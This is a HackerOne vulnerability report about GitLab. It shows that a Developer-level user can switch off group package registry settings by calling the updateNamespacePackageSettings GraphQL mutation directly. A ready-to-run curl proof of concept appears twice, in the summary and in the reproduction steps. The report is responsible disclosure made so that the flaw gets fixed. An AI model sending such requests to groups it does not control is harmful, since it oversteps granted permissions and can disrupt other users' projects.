Group Setting Package & Registry is Exposed to Low Privilege User
HackerOne report #1103232 by vaib25vicky on 2021-02-14, assigned to @dcouture:
Report | Attachments | How To Reproduce
Report
Summary
Only OWNER of the group can access & edit package & registry setting.
BUT low privilege user such as Developer can also DISABLE package & registry by directly sending the request to the GraqphQL API mutation updateNamespacePackageSettings
curl --request POST \
--url https://gitlab.com/api/graphql \
--header 'Authorization: Bearer <TOKEN>' \
--header 'Content-Type: application/json' \
--data '{"query":"\nmutation m1{\n updateNamespacePackageSettings(input:{namespacePath:\"newtestgroup4\",mavenDuplicatesAllowed:false}){\n errors\n }\n}\n\n","operationName":"m1"}'
⚠ Several reports where made with similar scenarios
When designing a solution, please make sure it will fix the following HackerOne reports
Steps to reproduce
- Create a group and add a second user with developer permission
- As developer run the mutation to DISABLE maven setting.
Replace newtestgroup4 with your group name and token with your personal access token
curl --request POST \
--url https://gitlab.com/api/graphql \
--header 'Authorization: Bearer <TOKEN>' \
--header 'Content-Type: application/json' \
--data '{"query":"\nmutation m1{\n updateNamespacePackageSettings(input:{namespacePath:\"newtestgroup4\",mavenDuplicatesAllowed:false}){\n errors\n }\n}\n\n","operationName":"m1"}'
Impact
Settings of group impact ALL projects & subgroups under that group. So if low privilege user DISABLE the maven repository then current packages in projects may be affected.
Attachments
Warning: Attachments received through HackerOne, please exercise caution!
How To Reproduce
Please add reproducibility information to this section: